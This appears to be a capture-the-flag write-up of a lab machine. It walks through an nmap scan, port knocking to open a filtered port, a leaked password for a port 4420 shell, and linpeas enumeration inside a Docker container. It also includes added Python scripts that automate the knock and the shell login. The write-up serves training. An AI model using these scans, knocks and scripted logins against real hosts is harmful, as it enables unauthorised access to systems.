$ nmap -sC -sV -p- -oN nmap.out 10.10.96.70
Nmap scan report for 10.10.96.70
Host is up (0.16s latency).
Not shown: 65530 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   filtered ftp
22/tcp   open     ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
2375/tcp filtered docker
4420/tcp open     nvm-express?
| fingerprint-strings:
|   DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     do not use ctrl-c
|     Please enter password:
|     Invalid password...
|     Connection Closed
|   NULL, RPCCheck:
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     do not use ctrl-c
|_    Please enter password:
8080/tcp filtered http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4420-TCP:V=7.91%I=7%D=6/8%Time=60BF02E4%P=x86_64-pc-linux-gnu%r(NUL
SF:L,A0,"INTERNAL\x20SHELL\x20SERVICE\nplease\x20note:\x20cd\x20commands\x
SF:20do\x20not\x20work\x20at\x20the\x20moment,\x20the\x20developers\x20are
SF:\x20fixing\x20it\x20at\x20the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\n
SF:Please\x20enter\x20password:\n")%r(GenericLines,C6,"INTERNAL\x20SHELL\x
SF:20SERVICE\nplease\x20note:\x20cd\x20commands\x20do\x20not\x20work\x20at
SF:\x20the\x20moment,\x20the\x20developers\x20are\x20fixing\x20it\x20at\x2
SF:0the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPlease\x20enter\x20passwo
SF:rd:\nInvalid\x20password\.\.\.\nConnection\x20Closed\n")%r(GetRequest,C
SF:6,"INTERNAL\x20SHELL\x20SERVICE\nplease\x20note:\x20cd\x20commands\x20d
SF:o\x20not\x20work\x20at\x20the\x20moment,\x20the\x20developers\x20are\x2
SF:0fixing\x20it\x20at\x20the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPle
SF:ase\x20enter\x20password:\nInvalid\x20password\.\.\.\nConnection\x20Clo
SF:sed\n")%r(HTTPOptions,C6,"INTERNAL\x20SHELL\x20SERVICE\nplease\x20note:
SF:\x20cd\x20commands\x20do\x20not\x20work\x20at\x20the\x20moment,\x20the\
SF:x20developers\x20are\x20fixing\x20it\x20at\x20the\x20moment\.\ndo\x20no
SF:t\x20use\x20ctrl-c\nPlease\x20enter\x20password:\nInvalid\x20password\.
SF:\.\.\nConnection\x20Closed\n")%r(RTSPRequest,C6,"INTERNAL\x20SHELL\x20S
SF:ERVICE\nplease\x20note:\x20cd\x20commands\x20do\x20not\x20work\x20at\x2
SF:0the\x20moment,\x20the\x20developers\x20are\x20fixing\x20it\x20at\x20th
SF:e\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPlease\x20enter\x20password:
SF:\nInvalid\x20password\.\.\.\nConnection\x20Closed\n")%r(RPCCheck,A0,"IN
SF:TERNAL\x20SHELL\x20SERVICE\nplease\x20note:\x20cd\x20commands\x20do\x20
SF:not\x20work\x20at\x20the\x20moment,\x20the\x20developers\x20are\x20fixi
SF:ng\x20it\x20at\x20the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPlease\x
SF:20enter\x20password:\n")%r(DNSVersionBindReqTCP,C6,"INTERNAL\x20SHELL\x
SF:20SERVICE\nplease\x20note:\x20cd\x20commands\x20do\x20not\x20work\x20at
SF:\x20the\x20moment,\x20the\x20developers\x20are\x20fixing\x20it\x20at\x2
SF:0the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPlease\x20enter\x20passwo
SF:rd:\nInvalid\x20password\.\.\.\nConnection\x20Closed\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 4420 is an "internal shell service" that asks for a password before it does anything; nmap's nvm-express label is only a guess from the port number.
Port 2375 is the default port of the Docker daemon's unencrypted remote API. It is filtered here, so a Docker host or container is probably involved.
Port Knocking
At this point, I didn't know how to proceed further. So, I just went and read a write up.
I learnt a new thing called port knocking.
In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports.
Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s).
A variant called single packet authorization (SPA) exists, where only a single "knock" is needed, consisting of an encrypted packet.
The post on the website gives the hint about port knocking and the sequence of ports to knock:
Before port knocking, nmap shows ftp as filtered:
$ nmap -p 21,22,2375,4420,8080 10.10.151.249
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 12:17 IST
Nmap scan report for 10.10.151.249
Host is up (0.21s latency).
PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   open     ssh
2375/tcp filtered docker
4420/tcp open     nvm-express
8080/tcp open     http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
Knocking the correct sequence with nc:
-v: verbose, print each connection attempt and its result
-z: zero-I/O mode, send no data and just attempt the TCP connect (meant for scanning, which is exactly what a knock is)
The knock client or nmap (with -Pn, so it does not skip the host when its ping probes are dropped) can do the same; only the order of the connection attempts matters, not whether they succeed.
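Scripting the knock, as an added example that is not code from the original write-up. It does with Python's socket module what the nc -z loop does (one connect attempt per port, in order, ignoring the expected failures on the closed or filtered knock ports) and then re-checks the target port the way the follow-up nmap scan did, reporting the same open/closed/filtered states a TCP connect scan gives. The host, sequence and target port in the usage comment are placeholders; the real sequence came from the site's post and is not reproduced here. demo_local exercises the check against a throwaway local listener so the script can be run without a target.

```python
import socket
import sys
import time
from typing import List, Sequence, Tuple


def parse_sequence(spec: str) -> List[int]:
    """Turn "7000,8000,9000" into [7000, 8000, 9000], rejecting bad ports."""
    ports = [int(p) for p in spec.split(",") if p.strip()]
    for p in ports:
        if not 1 <= p <= 65535:
            raise ValueError("port out of range: %d" % p)
    return ports


def knock(host: str, ports: Sequence[int], timeout: float = 1.0,
          delay: float = 0.2) -> List[int]:
    """One TCP connect attempt per port, in order (what `nc -z -w 1` does).

    Only the SYN has to reach the firewall, so the knock ports being closed or
    filtered is normal: refused and timed-out connects are ignored. Order and
    spacing are what matter; knockd-style daemons expect the whole sequence
    inside a short window, so keep `delay` small.
    """
    sent = []
    for p in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, p))
        except OSError:
            pass  # expected on a closed/filtered knock port
        finally:
            s.close()
        sent.append(p)
        time.sleep(delay)
    return sent


def port_state(host: str, port: int, timeout: float = 2.0) -> str:
    """'open' on a completed handshake, 'closed' on RST, 'filtered' on no reply.

    These are the three states a TCP connect scan reports, so this is the
    scripted version of re-running nmap after the knock.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except OSError:
        return "filtered"
    finally:
        s.close()


def knock_and_check(host: str, sequence: Sequence[int], target: int,
                    timeout: float = 1.0) -> Tuple[str, str]:
    """State of `target` before and after the knock; ('filtered', 'open') means it worked."""
    before = port_state(host, target, timeout)
    knock(host, sequence, timeout)
    return before, port_state(host, target, timeout)


def demo_local() -> Tuple[str, str]:
    """Offline check against a throwaway listener on 127.0.0.1.

    No firewall is involved here: the target flips from 'closed' to 'open'
    because we start listening, which is the transition knock_and_check looks
    for on a real host. The knock is aimed at the not-yet-listening port to
    show that refused connects are swallowed rather than raised.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    target = listener.getsockname()[1]
    knock("127.0.0.1", [target, target], timeout=1.0, delay=0.0)
    before = port_state("127.0.0.1", target, 1.0)  # bound but not listening: RST
    listener.listen(1)
    after = port_state("127.0.0.1", target, 1.0)
    listener.close()
    return before, after


if __name__ == "__main__":
    # Placeholder usage: python knock.py 10.10.151.249 7000,8000,9000 21
    # (the real sequence came from the site's post and is not reproduced here)
    h, seq, tgt = sys.argv[1], parse_sequence(sys.argv[2]), int(sys.argv[3])
    before, after = knock_and_check(h, seq, tgt)
    print("port %d before knock: %s, after: %s" % (tgt, before, after))
```

If the target still reads "filtered" afterwards, the usual causes are the wrong order, too long a gap between knocks, or a firewall that only opens the port for the knocking source address while the scan goes out from a different interface.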
The contents of note.txt gave the password for the internal shell on port 4420:
$ cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.
Connect to port 4420, the password is sardinethecat.
- catlover
Internal Shell
Log in to the internal shell with the password found:
root@7546fa2336d6:/root# chmod +x linpeas.sh
root@7546fa2336d6:/root# ./linpeas.sh > linpeas.out
[..snip..]
[+] System stats
Filesystem      Size  Used Avail Use% Mounted on
overlay          20G  7.3G   12G  40% /
tmpfs            64M     0   64M   0% /dev
tmpfs           240M     0  240M   0% /sys/fs/cgroup
shm              64M     0   64M   0% /dev/shm
/dev/xvda1       20G  7.3G   12G  40% /opt/clean
tmpfs           240M     0  240M   0% /proc/acpi
tmpfs           240M     0  240M   0% /proc/scsi
tmpfs           240M     0  240M   0% /sys/firmware
              total        used        free      shared  buff/cache   available
Mem:         490660      344948       17924        3148      127788      102468
Swap:             0           0           0
[..snip..]
The shell lands as root inside a container: the hostname is a Docker container ID and the root filesystem is an overlay mount. /dev/xvda1, the host's disk, is mounted at /opt/clean, so that directory is a host path exposed inside the container and is worth checking closely.
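A scripted client for the port 4420 service, added here as an example and not code from the write-up. The exchange is driven by the banner nmap captured: read until "Please enter password:", send the password, then treat "Invalid password..." followed by "Connection Closed" as a failed login. Nothing on the page shows what the service prints after a successful login, so run_command assumes only that it reads one line per command and answers with text, and reads until the peer goes quiet instead of waiting for a prompt. FakeInternalShell is a constructed stand-in that replays the captured banner so the client can be exercised offline; its echo of commands after login is an assumption.

```python
import socket
import sys
import threading

# Banner text exactly as nmap's fingerprint-strings captured it from port 4420.
BANNER = (
    b"INTERNAL SHELL SERVICE\n"
    b"please note: cd commands do not work at the moment, the developers are fixing it at the moment.\n"
    b"do not use ctrl-c\n"
    b"Please enter password:\n"
)
PROMPT = b"Please enter password:"
DENIED = b"Invalid password..."


def recv_until(sock, marker, limit=65536):
    """Read until `marker` shows up or the peer closes; the socket timeout bounds the wait."""
    buf = b""
    while marker not in buf and len(buf) < limit:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def read_quiet(sock, idle=0.5, limit=65536):
    """Read until the peer is silent for `idle` seconds or closes.

    The post-login output format is not documented, so there is no prompt to
    wait for; an idle timeout is the safe way to collect a reply.
    """
    buf, old = b"", sock.gettimeout()
    sock.settimeout(idle)
    try:
        while len(buf) < limit:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
    finally:
        sock.settimeout(old)
    return buf


class InternalShellClient:
    def __init__(self, host, port=4420, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)

    def login(self, password):
        banner = recv_until(self.sock, PROMPT)
        if PROMPT not in banner:
            raise RuntimeError("unexpected banner: %r" % banner)
        self.sock.sendall(password.encode() + b"\n")
        reply = read_quiet(self.sock, idle=1.0)
        # Failure is explicit ("Invalid password..." then "Connection Closed");
        # anything else, including silence, means the session stayed up.
        return DENIED not in reply

    def run_command(self, line):
        self.sock.sendall(line.encode() + b"\n")  # one line per command, never ctrl-c
        return read_quiet(self.sock).decode(errors="replace")

    def close(self):
        self.sock.close()


class FakeInternalShell:
    """Constructed stand-in for the 4420 service, only for exercising the client
    offline: replays the captured banner and denial text; echoing commands back
    after login is an assumption, not observed behaviour."""

    def __init__(self, password):
        self.password = password.encode()
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.bind(("127.0.0.1", 0))
        self.srv.listen(5)
        self.port = self.srv.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self.srv.accept()
            except OSError:
                return  # listener closed
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        with conn:
            conn.sendall(BANNER)
            f = conn.makefile("rb")
            if f.readline().rstrip(b"\r\n") != self.password:
                conn.sendall(DENIED + b"\nConnection Closed\n")
                return
            for line in f:
                conn.sendall(b"you ran: " + line.rstrip(b"\r\n") + b"\n")

    def close(self):
        self.srv.close()


if __name__ == "__main__":
    # python shell4420.py 10.10.151.249 4420 sardinethecat id
    c = InternalShellClient(sys.argv[1], int(sys.argv[2]))
    if not c.login(sys.argv[3]):
        sys.exit("login failed")
    print(c.run_command(sys.argv[4]), end="")
    c.close()
```

The idle-read approach is slower than prompt matching but does not break when the service's output format is unknown, which is the situation here; once the real post-login prompt is seen, recv_until with that marker is the better choice for run_command.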